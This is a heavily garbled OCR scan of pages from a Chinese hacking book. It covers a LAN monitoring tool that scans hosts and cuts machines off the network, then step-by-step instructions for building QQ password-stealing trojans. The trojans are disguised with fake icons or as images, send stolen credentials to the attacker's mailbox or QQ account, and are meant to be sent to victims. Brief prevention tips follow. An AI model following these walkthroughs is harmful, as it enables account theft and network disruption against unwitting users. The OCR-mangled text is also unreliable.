蚀 192. 168.1.88 ZKG WORKGROUP C8. 80. 00.78.58. AE 

> 168. 1.100 SZT-FC WORKGROUP 90. 28. 34.09.70. 49 
dn co _ 1 np NT ONMI OETDOVUE: Wp NN oD 24_ NN Tn nO 


nro 






























线 各 数 [322 | 证 | 






小 
“| 共享 文件 所 在 的 目录 
| 11. jp \\192. 168. 1. 


加 11.jipg 

BE 1212. jpe \\192. 168. 1. 四 SS ey 
4W1TO027. JPG \\192. 168. 1. >N 子 WW 中 
-| 哪 44170047. JPC \\192. 168. 1. ~ 

痢 唱 


[使 用 说 明 | _ 开始 








| 站 是 Mr 
人 








执行 线程 数 =0, 等 待 任务 数 =0 当前 窗口 : 搜索 计算 机 本 机 名称 : 4L8QD1ETPGKV51W , 本 




















14.3.2 长 角 牛 网 络 监控 机 


“长 角 牛 网 络 监 控 机 ”( 网 络 执法 官 ) 只 需 在 一 台 机 器 上 运行 ， 可 和 罕 透 防火 墙 ， 实 时 监 
控 、 记 录 整 个 局 域 网 的 用 户 上 线 情况 ， 可 限制 各 用 户 上 线 时 所 用 的 全 地 址 、 时 段 ， 并 可 将 
非法 用 户 跑 下 局 域 网 。 本 软件 适用 汽 围 为 局 域 网 内 部 ， 不 能 对 网 关 或 路 由 占 外 的 机 右 进 行 
监视 或 管理 ， 适 合 局 域 网 管理 员 使 用 。 

1. 安装 长 角 牛 网 络 监控 机 

“长 角 牛 网 络 监控 机 ”的 主要 功能 是 依据 管理 员 为 各 主机 限定 的 权限 ， 实 时 监控 整个 局 
域 网 ， 并 上 自动 对 非法 用 户 进行 管理 ， 可 将 非法 用 户 与 网 络 中 某 些 主机 或 整个 网 络 隔离 ， 而 
且 无 论 局 域 网 中 的 主机 运行 何 种 防火 载 ， 都 不 能 逃避 监控 ， 也 不 会 引发 防火 墙 警告 ， 提 高 
了 网 络 安全 性 。 

在 使 用 “长 角 牛 网 络 监控 机 ”进行 网 络 监控 前 应 对 其 进行 安装 ， 有 具体 的 操作 步骤 曝光 
如 下 。 


STEP01: 双击 安装 程序 图 标 STEP02: 安装 向 导 


冶 | 安装 - Netrobocop v3.48 















































欢迎 使 用 Netrobocop Y3. 48 安装 向 导 
现在 将 安装 Netrobocop 到 您 的 电脑 中 。 

推荐 您 在 继续 去 装 前 关闭 所 有 其 它 应 用 程序 。 

单 击 “ 下 一 步 ”继续 ， 或 单 击 “取消 ” 退 出 安装 程序 。 


| 选择 安装 时 要 全 用 的 硝 言 : 





| 下 一 步 @) > | 取消 | 








选择 需要 使 用 的 语言 后 ， 单 击 “ 确 定 ” 按 钮 。 单 击 “ 下 一 步 ” 按 钮 。 
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攻防 从 入 门 到 精通 


信人 全 
STEP03: 选择 目标 位 置 STEP04: 选择 放置 程序 快捷 方式 位 置 


安装 - Netrobocop v3.48 | 六 | 安装 - Netrobocop v3.48 


选择 目标 位 置 | 选择 开始 菜单 文件 去 
您 想 将 Wetrobocop v3.48 安装 在 什么 地 方 ? 您 想 在 哪里 放置 程序 的 快捷 方式 ? 





| 安装 程序 将 安装 Hetrobocop v3. 委 到 下 列 文件 来 中 。 | 安装 程序 现在 将 在 下 列 开始 菜单 文件 夹 中 创建 程序 的 快捷 方式 。 


单 击 “ 下 一 步 ” 继 续 。 如果 您 想 选 择 其 它 文件 夹 ， 单 击 “ 浏 览 ”。 单 击 “ 下 一 步 ” 继 续 。 如 果 您 想 选 择 其 它 文件 赤 ， 单 击 “ 浏 览 ”。 
:YErogram Files\Hetrobocop 浏 | ps 浏览 R)... 





至 少 需 要 有 7.3 是 的 可 用 磁盘 空间 。 





[EC [ EB 世 醒 呈 
选择 安装 目标 位 置 后 ， 单 击 “下 一 步 ”按钮 。 单 击 “ 下 一 步 ， 按钮 。 
STEP05: 选择 附加 任务 STEP06: 准备 安装 


襄 安装 - Netrobocop v3.48 六 | 安装 - Netrobocop v3.48 
选择 附加 任务 备 安装 
您 想 要 去 装 程序 执行 哪些 附加 性 务 ? (A 安装 程序 现在 准 肯 开始 安装 Hetrobocop v3. 48 到 您 的 电脑 中 。 
半 守 入 村 各 康美 程 序 人 安装 Netrobocop v3. 48 时 执行 的 附加 任务 ,然后 单 击 ne “安装 ”继续 此 安装 程序 。 如 果 您 想 要 回顾 或 也 变 设 置 ， 请 单 击 “ 上 一 


附加 快捷 方式 : 目标 位 置 : 
加 创建 桌面 快捷 方式 0) 了 D:\ 安 装 \Netrobocop 
同 创建 快速 运行 烂 快捷 方式 @@) 开始 菏 单 文件 来 : 


Hetrobocop 


附加 性 
i 








EECEEEODI [CE EEC 
选择 要 执行 的 附加 任务 ， 单 击 “下 一 步 ” 按钮 。 单 击 “安装 ”按钮 ， 开 始 安装 并 显示 安装 进度 。 


STEP07: 完成 安装 STEP08: 双击 “Netrobocop” 图 标 


六 | 安装 - Netrobocop v3.48 
设置 扫 摘 子 了 网 /ATP 段 一 


Netrobocop Y3. 48 安装 同 导 完 成 : l 
选择 网 卡 : [Atheros AR8151 PCI-E Gigabit Ethernet Controller ”| 


宫 兹 程度 中 存 入 及 中 家 靖 Rh "3.46。 此 网 卡 描述 : htheros AR8151 PCI-E Gigabit Ethernet Controller 
子 网 [IP:192. 168.1.10/24 [192. 168.1.1 - 192.188.1. ee ” 
单 击 “ 完 成 ”退出 安装 程序 。 


网 运行 etrobocop 





监控 如 下 子 了 网 及 IP 段 : 


poq 挫 并 加 ; 如 
192. 168. 1. 10 255: 255:.255.0 192.168; 1:1 = 192: 168. 下 





手工 操作 ， 取 消 自动 运行 。 


| | | 确定 || 退出 | 


单 击 “ 完 成 ”按钮 ， 即 完成 安装 。 指定 监测 的 硬件 对 象 和 网 段 范 围 ， 单 击 “ 添 加 / 修 
改 ” 按 钮 ， 再 单 击 “确定 ”按钮 。 
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U | S 
BC-21-OA-89-AE-B6 已 192.168.1.1 - 2013-12-13 17:15:31 
90-2B-34-09-76-F7 192. 168. 1. 15 - 2013-12-13 17:15:31 显 = 在 同 个 局 或 网 下 的 所 有 用 户 可 查看 其 状态 
一 一 一 口 ~、 
90-2B-34-09-76-F4 Ee 192. 168.1. 55 他 -一 2013-12-13 17:15:31 MP /和 下 号 [万 i 站 ;器 写 < 7ZCN、 
C8-60-00-78-53- 幅 192. 168. 1. 88 DD WORKGROUP / ZEG / ZEG ~ 2013-12-13 17:15:31 


| 流量 、IP 地 址 、 是 否 锁定 、 最 后 上 线 时 间 、 下 线 时 
间 、 网 卡 注释 等 信息 。 





“网 卡 MAC 地 址 ”是 网 卡 的 物理 地 址 ， 也 称 人 硬件 地 址 或 链 路 地 址 ， 是 网 卡 自 喘 的 唯一 
标识 ， 一 般 不 能 随意 改变 。 无 论 把 这 个 网 卡 接 入 到 网 络 的 什么 地 方 ，MAC 地 址 都 不 变 。 其 
长 度 为 48 E 由 12 个 00~0OFFH 的 十 六 进 制 数组 成 , 每 个 十 六 进 制 数 之 间 用 “--” 
阳 开 ， 如 “00-0C-76-9F-BC-02”。 

2. 查看 目标 计算 机 属性 

使 用 “长 角 和牛 网 络 监控 机 ”可 搜集 处 于 同一 局 域 网 内 所 有 主机 的 相关 网 络 信 息 。 具 体 
的 操作 步骤 曝光 如 下 。 


STEP01: 打开 “长 角 牛 网 络 监控 机 ” 主 窗口 STEP02: 查看 用 户 属性 














系统 [T] 《设置 [S] 用 户 [U] 数据 [D] 。 医 动 [H] | 用 户 舌 楚 
| 图 本 网 用 户 | 国 服务 昨 则 | 国 记录 下 | 0-2B-34-09-7C-28 生产 | 这 .GIGA-BYTE TECHNOLIGY CO LTD 


| 9 卡 冯 BR IP 机 ] 说 中 b 用 广 早生 Wi 
[2c- 21-0A-89-AE-E6 8 192.168.1.1 四 一 2013-12-13 17:15:31 用 户 注释 /6IGA-BYTE TECHNOLDGY C0. ,LID. 保存 | 








| 90-2B-34-09-76-F7 192.168.1.15 他 Pe 2013-12-13 17:15:31 


| 二 90-28-34-09-76-P4 192. 168. 1.55 人 一 2013-12-13 17:;15:31 IF 地 址 [192. 188. 1. 102 


| C8-60-00-78-53-AE 192. 168. 1.88 (ey WORKGROUP / ZKG / ZKG 2013-12-13 17:15:31 
| 入 90-28-34-09-70-49 192.168.1.100 ”多 【" 网 络 邻 居 " 主 控 器 ] % 2013-12-13 17:15:31 组 /主机 ;用户 [WORKGROUF ” ALBQDIETPGEVSIW / 4L8QD1ETPGEVS1Y 


| 号 90-28-34-09-Tc-28 已 19z.168.1.102 四 YORKGHOUE / 4L39D1F... 2013-12-13 17:15:32 
首次 上 线 [2013-12-13 17:15:32 - 2013-12-13 18:03:22 


末次 上 线 E013-12-16 11:17:20 - 当前 在 妓 


图 历史 记录 | (总 设置 权限 | | (2) 星 除 用 户 | 天 闭 | 


双击 用 户 列表 中 需 要 查看 的 对 象 。 查看 用 户 的 网 卡 地 址 、IP 地 址 、 上 线 情 况 等 ， 单 击 
“历史 记录 ”按钮 。 














STEP03: 打开 “在 线 记 录 ” 对 话 框 





用 户 ; [80-25-34-09-TC-26 [生产 厂家 :GIGA-BYTE TECHNOLDGY 50. ,LTD.] 
注释 : |6IGA-BYTE TECHNOLDGY C0., LTD. 


EE 
(BD) 192. 168.1. 102 WORKGROUP / 4LBQD1ETPGEYSIW ... 2013-12-16 11:17:20 
WD) 192.168.1.102 WORKGROUP / 4LBQDIETPGKVSIW ... 2013-12-13 17:15:32 


查看 该 计算 机 上 线 的 情况 。 





4 | Wm 





Ty 全 习 ,站 和。 
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攻防 从 入 门 到 精通 





3. 批量 保存 目标 主机 信息 
除 收集 局 域 网 内 各 个 计算 机 ee 之 外 “长 角 牛 网 络 监控 机 ”还 可 以 对 局 域 网 中 的 主 
机 信息 进行 批量 保存 。 有 具体 的 操作 步骤 曝光 如 下 。 


STEP01: 打开 “长 角 牛 网 络 监 控 机 ” 主 窗口 








对 长 角 牛 网 络 监 皖 机 试用 版 v3.68 
系统 [T] “设置 [S] 用户 [U] 数据 [D] 让 
~ 、 S rn 
于 本 机 状态 | 画 本 网 用 户 | 辐 服务 此 弄 [Esse 8 单 击 “ 记 录 查 询 ” 按 钮 。 
”查找 对 象 ER TI 
用 户 : | -- 所 有 用 户 一 -| 90-23-34-09-TC-29 DB 192.168.1.102 
权限 : | 茵 = ~ 所 有 用 EE --- 加 90-2B-34-09-70-49 人 192.166.1.100 


C8-80-00-78-58-AE 的 192.168.1.88 
| 通 梧 符 : % ? 90-23-34-09-T6-F4 的 192.168.1.55 
| 组 /主机 /用 户 名 包含 : 90-2B-34-09-76-F7 A 192.168.1.15 


| | | 8C-21-0A-89-AE-BB 挡 192.168.1.1 
| 往 释 " 虽 全 


oo 输入 起 始 IP 地 址 和 结束 IP 地 址 。 

国 单 击 “查找 ”按钮 ， 开 始 收集 局 域 网 中 计算 机 
的 信息 。 

单 击 “ 导 出 ”按钮 , 将 所 有 信息 导出 为 文本 文件 。 





= 





STEP02: 查看 导出 的 文本 文件 


了 TemAa900,btt - 记事 本 | 
诡 尾 [站 ” 韦 福 (E) 从 ENO) 去 客 (Y) 和 罕 助 (站 

序号 , mac, 所 用 IP, 名 称 , 上 线 时 间 , 下 线 时 间 , 下 线 原 因 , 用 户 注释 

Es 90-2B-34- 09-7C-28, 192. 168. 1. 102, WORKGROUP / 4L8QD1ETPGKV51W / 
AL8QD1ETPGKVS1W, 2013-12-13 17:15, 2013-12-13 18:03, 未 知 , GIGA-BYTE 
TECHNOLOGY C0. , LTD. 

2, 90-2B-34-09- 70- 49, 192. 168. 1. 100, WORKGROUP / SZY-PC / SZY-PC, 2013 
-12- 13 17:15, 2013-12- 13 1744 未 知 ， GIGA-BYTE TECHNOLOGY CO., LTD. 

3, C8-60-00-78-58-AE, 192. 168. 1. 88, WORKGROUP / ZKG / ZKG, 2013- 12-13 
17: 15, 2013-12-13 17:44, 未 知 , ASUSTek COMPUTER INC. 

4, 90-2B-34-09-76-F4, 192. 168. 1.55,- / -~ / -,2013-12-13 17:15,2013- 
12- 13 18:03, 未 知 ， GIGA- BYTE TECHNOLOGY C0. ， LTD. 


本 全 信 me -12- E 查 i = 三 自 
全 lel Ble teiNoL oly cb. Oe 查看 文本 文件 中 所 记录 的 信息 。 





6, 3C-21-0A-89-AE-BG, 192. 168. 1.1,-/-/- ps 12-13 17:15,2013-12 
-13 18:03, 未 知 , TP-LINK TECHNOLOGIES C0.， 








设置 关键 主机 
en 是 由 管理 员 指 定 的 IP 地 址 ， 可 以 是 网 关 、 其 他 计算 机 或 服务 右 等 。 管 
员 将 指定 的 卫 地 址 存 入 “关键 主机 ”之 后 ， 即 可 令 非 法 用 户 仅 断 开 与 “关键 主机 ”的 连 
而 不 断 开 与 其 他 计算 机 的 连接 。 
设置 “关键 主机 组 ”的 其 体操 作 方法 曝光 如 下 。 
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14 章 
局 域 网 攻防 


STEP01: 打开 “长 角 牛 网 络 监控 机 ” 主 窗口 STEP02: 关键 主机 组 设置 








多 攻 负 和 牛 忆 二 性 过 试用 版 v3.68 | Eo 

EE 用 户 IU】 孝 手 [D] 二 

CE | 
0 隐 卡 权限 及 地 ay | 


Wl IPH 区 也 志 用 己 圳 了 间 
192. 166. 1. 102 党 2013-12-13 17;15:: 
192. 168.1.100 Re 2013-12-13 17:15:: 
C8-60-00-78-58- 二 192. 168. 1.88 2013-12-13 17:15:: 
90-2B-34-09-76-F4 bb = 2013-12-13 17;15:、 
90-2B-34-09-76-F7 192. 168. 1. 15 2013-12-13 17:15:: 
BC-21-0A-89-AE-Pp8 192. 168.1.1 Re 2013-12-13 17;15:: 





组 内 IP 组 名 称 : 一 #1 


0.0.0.0 3 [0.0.0.0 
3 [0.0.0.0 B. [0.0.0.0 


: |i92.168.0.1 
192,1868. 1.255 


闻 : |2013-11-l6 11:17 一 
-|2013-12-16 11:17 = 


续 在 绸 : 万。 小 时 以 上 


9 Fo sp 
aooo 12 pooo 
0 ”1000 一 
oe poo 











EE 一 一 一 全 部 保存 取 消 
Tcp:88 Udp:74 ”运行 00:02'49* 试用 版 本 ， 枯 在 27 分 可 后 结束 管理 功能 


选择 “设置 ”一 “关键 主机 组 ”菜单 命令 。 设置 关键 主机 组 的 名 称 和 “组 内 IP” 之 后 , 单 击 “全 
部 保存 ”按钮 , 使 关键 主机 的 修改 即时 生效 并 进行 
保存 。 




















5. 设置 默认 权限 

“长 角 牛 网 络 监控 机 ”还 可 以 对 局 域 网 中 的 计算 机 进行 网 络 管理 。 它 并 不 要 求 安 
装 在 服务 器 中 , 将 它 安 装 在 局 域 网 内 的 任 一 台 计 算 机 上 ， 即 可 对 整个 局 域 网 内 的 计算 
机 进行 管理 。 

设置 用 户 权 限 的 具体 操作 曝光 如 下 。 


STEP01: 打开 “长 角 牛 网 络 监 控 机 ” 主 窗 口 STEP02: 用 户 权 限 设置 
































mac BC-21-OA-B9-AE-B6  [ TP-LINK TECHNOLDGIES CO., LTD.] 
该 用 户 权限 为 系统 赋予 的 默认 可 限 ， 时间 2013-12-13 17:15:00 。 








内 卡 权限 及 地 WIFE: 天 中 /用 忆 绪 H 则 
90-25-34-09-TC-28 .168.,1, Ess 2013-12-13 17:15:: | 
90-28-34-09-70-49 .168. 1 SZY-?C ... 2013-12-13 17:15:: 
C8-60-00-78-58-AE -168. 1. 2013-12-13 17:15:: 
90-25-34-09-T6-74 .166. 1. 2013-12-13 17:15:: 
90-2B-34-09-76-F7 192. 168. 1.15 md 2013-12-13 17:15:: 
8C-21-0A-89-AE-PB6 192.168.1.1 =” 2013-12-13 17:15:: 





- 设置 权限 
从 自由 用 户 ， 与 网 络 连 接 不 爱 限 制 。 

受 限 用 户 ， 若 违 到 以 下 权限 将 被 管理 。 
厂 启用 王 限 制 























启用 时 间 限制 品 启用 时 段 限制 
| 开放 时间 0.0 小 时 ， 屏 葵 时 间 24.0.] ”|[ 蔚 用 期 : 2013-12-13 17:1 
启用 组 /主机 /用户 名 限制 








可 天 未 上 线 则 设 为 禁止 用 户 
| 个 禁 目 用户 ,发现 该 用户 上 线 即 管理 。 
对 造反 以 上 权限 的 用 户 ， 将 生动 按 以 下 方式 进行 管理 。 








站 习 





与 指定 关键 机 组 的 连接 : 未 设置 












































?粘贴 坪 6 贴 (天 IP) 








选择 “用 户 ” 一 “权限 设置 ”菜单 命令 ， 选 择 一 个 ”选择 “ 受 限 用 户 ， 若 违反 以 下 权限 将 被 管理 ” 单 选 
ed 按钮 之 后 , 如 果 需 要 对 IP 进 行 限制 , 则 可 勾 选 “启用 
IP 限 制 ” 复 选 框 ， 并 单 击 “禁用 以 下 IP 段 : 未 设 定 ” 














按钮 。 
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E33 
取 FRI 一 > 
于 攻防 从 入 门 到 精通 





信人 全 
STEP03: 打开 “IP 限制 "对话 框 STEP04: 返回 用户 权 限 设置 ”对 话 框 


; mac 8C-21-DA-89-AE-BB [ TP-LINK TECHNOLDGIES C0., LITD. ] 
a Te 该 用 户 权限 为 系统 趴 予 的 默认 权限 ， 时 间 2013-12-13 17:15:00 。 


时 违反 以 上 权限 的 用 户 ， 将 自动 按 以 下 方式 进行 官 理 。 





频率 : | 9 -| 
关键 主机 组 | 
| 玛 感 主机 | 


保存 | 取 消 
对 IP 进 行 设置 ， 然 后 单 击 “确定 ”按钮 。 选择 “禁止 用 户 , 发 现 该 用 户 上 线 即 管理 ” 单 选 按钮 ， 
即 可 在 “管理 方式 ”选项 组 中 设置 管理 方式 ， 当 目 
标 计算 机 连 入 局 域 网 时 ， 即 按照 设置 对 该 计算 机 进 

行 管理 。 























6. 禁止 目标 计算 机 访问 网 络 
禁止 目标 计算 机 访问 网 络 是 “长 角 牛 网 络 监控 机 ”的 重要 功能 ， 有 具体 的 禁止 方法 曝光 
如 下 。 


STEP01: 打开 “长 角 牛 网 络 监 控 机 ” 主 窗 口 STEP02: 打开 “锁定 /解锁 ”对 话 框 





人 i 注释 : [TP-LINK TECINOLOGIES Co., LTT. 


| L152 L650 
B02B-34-00-76-FT | 92. 100 | 2043-12-16 11:17:20 a 
30-2-34-09-TB-F4 192 16E 2043-12-16 11:17:20 s : EE 阁 时 ee 
C8-60-00-78-56-AE Dl 192. 16E : 2043-12-16 11:34:08 请 不 要 对 i 才 如 路 由 器 、 交 换 机 、 服 务 辟 等 网 络 关键 设备 进行 锁定 。 
80-26-34-00-T0-49 . 要 2z0t3-12-16 11:17:20 pL 
s0-26-34-09-1C-26 2 2083-12-16 40217320 祺 定 方式 :: 
s0-26-34-09-T8-BA ; 答 理 (Nv 203-12-16 11:17:20 


(10-68-39-80-08-5C 2043-12-16 1L: 久 :外 全 不 淡定 【解锁 ) 
rT 全 禁止 与 以 下 关键 主机 组 的 TCP/IP 连 接 
广 第 ] 组 所 第 组 ” 厂 弟 3 组 
三 第 5 组 。” 三 第 6 组 三 第 7 组 





右 击 “ 用 户 列 表 ” 中 的 任意 一 个 对 象 , 在 弹出 的 快捷 ”选择 “禁止 与 所 有 主机 的 TCP/IP 连 接 ( 除 敏感 主 


菜单 中 选择 “锁定 /解锁 ”命令 。 机 外 ) ” 单 选 按钮 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 禁止 目 
标 计 算 机 访问 网 络 。 
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QQ 账 与 攻防 


当 用 户 的 QQ 受到 攻击 之 后 , 不 但 用 户 自 己 的 信息 和 财产 等 可 能 受到 威胁 ， 
还 极 有 可 能 给 他 人 市 去 安全 隐患 ( 因为 邮箱 中 可 能 存放 一 些 有 用 的 信件 )， 因 此 
应 该 对 存在 的 安全 问题 进行 相应 的 防御 措施 ， 


O QQ 号 码 资 取 防范 
O 用 密码 监听 器 揪 出 “内 鬼 ” 
O 保护 QQ 密码 和 聊天 记录 





= 一 > 
全- 攻防 从 入 门 到 精通 


15.1 QQ 号码 盗 取 防范 


人 们 在 使 用 QQ 的 过 程 中 ， 也 许 经 名 会 听 到 菏 个 朋友 的 QQ 喜 码 被 盗 的 消息 ， 那 么 ， 这 些 
QQ 写 公 是 怎么 被 盗 的 呢 ? 平时 使 用 QQ 时 应 该 注意 哪些 方面 才能 防止 QQ 被 盗 呢 ? 下 面 以 三 
种 常见 的 QQ 吕 查 盗 吕 手段 为 例 ， 曝 认 QQ 写 介 被 瓷 的 过 程 ， 并 给 出 相应 的 防范 指 施 。 


15.141 “QQ 入 单 盗 ” 盗 取 QQ 密码 曝光 与 防 玫 方法 
“QQ 简单 盗 ” 是 常用 的 盗 取 QQ 号 码 工 具 ， 它 采用 进程 插入 技术 ， 使 软件 本 身 不 产生 
进程 ， 因 而 很 难 被 发 现 。“QQ 简单 次 ”能 够 目 动 生成 木马 ， 只 要 将 该 木马 发 送 给 目标 用 户 ， 
并 使 其 在 目标 计算 机 中 运行 该 木马 ， 就 可 以 达到 盗 取 目 标 计算 机 中 的 QQ 密码 的 目的 。 
1. QQ 简单 盗 盗 号 曝光 
黑客 盗 取 QQ 的 具体 过 程 曝光 如 下 。 
STEP01: 打开 “QQ 简单 盗 ” 主 窗口 STEP02: 提示 用 户 查 看 测试 信件 信息 











发 信和 邮箱 : qq dde21cn, com 
发 信箱 密码 


请 察看 您 的 邮箱 是 否 收 到 讽 斌 信件 


sntp 服 务 器 [smtp 2lcn com 儿 | | 测 式 必 信 


mr 
生成 木马 扩展 名 : 四 exe [jscr [Decmd [lbat 


Lh Mhttp:/ /www. qq dd. com/ yx. exe 








团 下 载 并 解压 压缩 填写 收 /发 信 邮 箱 、 发 ” 单 击 “OK” 按 钮 。 

包 ， 打开“QQ 简 单 。 ”信箱 密码 和 smtp 服 务 器 ， | 涩 之 。 ”填写 smtp 服务 器 时 要 注意 与 发 信 邮 
、p SE i V ol 

盗 。 主 窗口 。 并 单 击 测试 发 信 按钮 。 | 注意 箱 相对 应 ， 否 则 可 能 无 法 收 到 测试 信件 。 





STEP03: 返回 主 界面 STEP04: 选择 木马 图 标 
1 扩 开 


二 [| “d 国 
= 名 称 站 修改 日 期 
2013/8/5 22:28 
2013/8/5 22:28 
2013/11/26 21:01 





美 获 取 99 的 9 币 数 量 
窒 破 ag2006beta3 的 安全 锁 防护 ， 中 马 后 99 登 陆 框 不 : 
出 现 红 服 


芭 ATL80.dll 2013/7/21 15:39 
3| atl100,dIl 2013/7/21 17;05 
时 BConv32.exe 2009/1/4 10:43 
3|bp_da.dll 2009/1/4 10;43 
eBPSDA.exe 2009/1/4 10:43 
划 BPSRegWD.dll 2009/1/4 10:43 
BPSUnlock.exe 2009/1/4 10:43 
Ebugreport.txt 2008/12/9 18:03 


开罗 内 汪 生 2 二， 刘 挤 所要 下载 人 机 才 上 3X 


国 Calc32.exe 2009/1/4 10:43 





单 击 “ 选 择 木 马 图 标 ” 按 钮 。 任意 选择 图 标 然后 单 击 “ 打 开 ” 按 钮 。 
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< 第 15 癌 
QQ 账号 攻防 


STEP05: 返回 主 界面 STEP06: 存储 木马 文件 
最 新 说 明 : EE 









M0) -co 
Se > 名 称 修改 日 其 
Dl 7.21.18C 2013/12/12 21:05 

2013/12/19 16:39 

er 下 2013/10/28 10:49 

桌面 | 2013/1/23 9:46 
2013/10/28 10:47 
2013/11/19 14:21 
2013/10/22 9:48 
2013/11/6 8:40 
2013/7/3 20:00 
2013/9/23 10:53 
2013/11/8 10:03 
2013/12/16 16:09 ~- 


钼 简单 次-- 最 新 免 杀 2006 年 9 月 25 日 更 新 ) 


rm . 


= 大 e2006bete3 有 安全 向 防护 ， 中 马 后 Q9 登 陆 框 不 : 
出 现 红 久 


麻 抽 ni 本 下 开机 克 上 YE : 



























本 
mr fe | 
= 
在 主 界面 查看 即将 单 击 “生成 选择 木马 存储 位 置 并 单 击 “ 保 存 ” 按 钮 。 
生成 的 木马 图 标 。 木马 ”按钮 。 
STEP07: 木马 生成 提示 信息 STEP08: 查看 已 生成 的 木马 
GH Hm; nia (0) » 2 9 EE al 
rr nn ~ 加 |"| 团 @ 
| | | 二 二 三 3 
| 缔 | 全 
a License.txt setup.exe Uninstall.exe 
单 击 “确定 ”按钮 。 在 存储 位 置 可 查看 已 经 生成 的 木马 。 











将 生成 的 木马 发 送 给 目标 用 户 ， 只 要 目标 用 户 在 目标 计算 机 中 运行 该 程序 ， 黑 客 就 能 
够 获取 该 计算 机 中 的 QQ 密码 。 

2. 防 学 QQ 简单 盗 

在 公共 场所 上 网 的 QQ 用 户 应 该 特别 注意 ， 以 防 被 这 种 方法 盗 取 QQ， 如 果 条 件 允 许 ， 
最 好 先 用 杀毒 软件 对 计算 机 进行 杀毒 再 进行 登录 。 同 时 ， 也 不 要 轻易 接收 QQ 好 友 发 过 来 的 
不 明文 件 ， 它 说 不 定 就 是 一 个 盗 取 QQ 的 软件 ， 一 旦 运行 ，QQ 也 就 没有 任何 安全 性 可 言 了 。 














19.1:2 “好 友 号 好 好 盗 ” 盗 取 QQ 号码 曝光 


“好 友 写 好 好 盗 ” 是 为 一 球 第 用 的 远程 盗 写 软件 ， 可 在 对 方 好 友 在 线 时 对 其 QQ 写 人 码 进 
行 盗 取 。 该 软件 使 用 图 片 进行 伪装 ， 直 接 通过 QQ 传 回 密 码 ， 还 具有 加 密 传递 信息 功能 。 
黑客 利用 该 工具 盗 取 QQ 所 但 的 过 程 星 论 如 下 。 
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取 


STEPO1: 


合 人 他 他 


打开 “好 友 号 好 好 盗 ” 主 窗口 


FF 天 一 





哆 剑 响 软 件 工作 室 - 好 友 号 好 好 盗 -For QQ2003II 


全 


我 比较 懒 (一 键 0k 


三 行 浴 


类 





剑 啊 软件 工作 室 


人 WWWwW. jxsoftware.co 


QQ: 770 和 950 


强制 关闭 ao 的 分 钟 数 ey 关于 


全 论坛 





输入 自己 的 OO 号 码 。 国 单 击 “ 浏 览 ” 按钮 。 


辆 查看 选择 的 图 片 和 指定 的 


STEPO3: 


你 的 ge 三 


驳 择 一 个 JPG 人 图片 


指定 保存 的 文件 名 


C: ‘Users"ADMINI 1\AppData\Local\Temp 示 从 | 图片“ 我 的 图 上 


我 比较 懒 《一 键 OK) 


单 击 


返 


运行 次 数 


C: Users“hDNMINI 1\AppDatanLocalh\Temps 二 二 图 片 “MM. jpe 浏览 


“浏览 ”按钮 。 





回 主 界面 


叭 到 响 软 件 工作 室 - 好 友 号 好 好 次 -For QQ2003 王 


剑 响 软件 工作 室 


3 WWW. ixsoftware.com 
上 @ 台 :77045750 
强制 天 六 89 的 分 神 数 。 gy 关于 


钥 论 坛 





STEP05: 返回 “好 友 号 好 好 盗 ” 主 窗口 
尼 记 响 软件 工作 室 -好 友 号 好 好 姿 -For QQ2003I 


我 比较 情 《“ 一 键 0K) 


文件 名 。 
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有 


次 数 


， 全 虽 软件 工作 宇 
3 


WWW.jxXSoftware.com 
Qae:77045750 


强制 关闭 99 的 分 钟 数 。 ey 关于 
a 





木马 ”按钮 。 


> 
攻防 从 入 门 到 精通 





国 单 击 “生成 





STEP02: 选择 图 片 

















' 愉 你 要 给 网 友 秦 什么 图 片 ? 
‘CINE ， 库 图片， -| 二 | Ee 
组 织 新 建文 件 实 
A Ee = 
六 收藏 天 图 片 库 排列 方式 ， 文 件 夫 > 
中 下 载 包括 : 1 个 位 置 
| 右面 WOUUBUSUFYUOFAYGBFIFSAZLYFAL... 42Jp9g 
汪 | 最 后 访问 的 位 置 引 ”里 11ljpg 哎 292d5aa1679f37604a36d6db,jpg 
> 里 20120510050121556jpg 时 20120510050525339,jpg 
度 里 20120521053321255jpg 另 20120527014350934jpg 
J 
ppTvig 硕 曙 3855925706059442697jpg 蜂 psb (37)jpg 
[el 
国 视 啊 psbjpg 啊 QQ 截图 20040122143704,jpg | 
避 图 片 曙 QQ 埠 图 20040122143809jpg 曙 QQ 攻 图 20140104160454,jpg 
辣 文 档 胶 QQ 私 图 20140104202707jpg 晒 QQ 壹 图 20140104202737jpg 
讯 嘻 下载 另 QqQ 哉 图 20140416171641,jpg 另 QqQ 吉 图 20140808111457,jpg 
[ejl 
小 音乐 曙 QQ 图 片 20131206125242jpg 曙 QQ 目 片 20131206125246,jpg 
”W17086096hdff6a612.inn 呈 a 竺 259 而 周 -sten1.inn 
文件 名 (N); QQ 爱 图 20040122143704jpg ~ |JPEG 图 片 -| 








打开 (0) | 取消 


在 自己 的 计算 机 上 单 击 “ 打 开 ” 按钮 ， 
选择 一 张 图 片 。 添加 该 图 片 。 











STEP04: 指定 木马 路 径 


哆 你 要 将 木马 放 在 是? 
GOOG Hn , enti F) ; oy Ey | eg 
蛋 ~ 团 ©@ 


baidu BaiduYunDownl BaiduYunGuanji Fast File Splitter 
download oad a 


旧 MSN 上 的 “ 拉 FavoriteVideo 


» 纪 网 阁 bc i i 
文件 冬 (IN): QQ 














指定 保存 的 路 径 以 及 单 击 “打开 ”按钮 。 
文件 名 。 
STEP06: 木马 制作 完毕 


OK 


贺喜 ,木马 生成 成 功 ,保存 在 : 
FN\OO,scr 





单 击 ,确定 ， 按钮 。 此 时 可 以 将 生成 的 木马 发 给 
友 ， 还 可 以 设置 运行 的 次 数 和 强制 天 闭 对 方 QO 的 时 
间 。 
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QQ 账号 攻防 


© 单 击 “ 我 比较 懒 (一 键 OK )” 按 钮 可 以 使 用 软件 自 带 的 图 片 。 





当 对 方 接收 到 带 木 马 的 文件 之 后 ， 关 注 其 在 线 状态 ， 如 果 发 现 对 方 突然 下 线 ， 则 可 能 


是 木马 已 经 起 作用 了 。 等 对 方 再 次 上 线 之 后 ， 再 发 一 
时 便 会 将 对 方 的 QQ 号 码 和 密码 通过 QQ 信息 发 送 过 


15.1.3 


条 信息 过 去 ， 如 果 没 有 遇 到 问题 ， 此 





“QQEXplorer ”在线 破解 QQ 号 码 曝 


来。 


光 与 防范 方法 








QQ 在 即时 通信 和 领 
各 有 个 慎 ， 
却 也 是 防不胜防 了 。 

1. 在 线 破 解 QQ 号 码 


QQExplorer 是 一 于 比较 党 用 的 在 线 人 破解 QQ 密码 的 工 








